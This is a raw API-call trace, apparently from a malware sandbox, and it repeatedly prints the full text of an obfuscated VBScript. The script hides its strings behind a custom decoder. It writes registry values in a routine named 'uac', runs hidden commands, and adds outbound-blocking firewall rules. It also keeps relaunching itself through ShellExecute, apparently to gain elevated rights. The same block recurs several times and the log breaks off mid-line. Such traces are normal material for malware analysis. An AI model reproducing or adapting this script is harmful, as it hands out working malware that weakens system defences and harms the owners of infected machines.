bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0223.021] wcsncmp (_String1="scription = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0223.021] wcsncmp (_String1="cription = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0223.021] wcsncmp (_String1="ription = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0223.021] wcsncmp (_String1="iption = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0223.022] wcsncmp (_String1="ption = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite 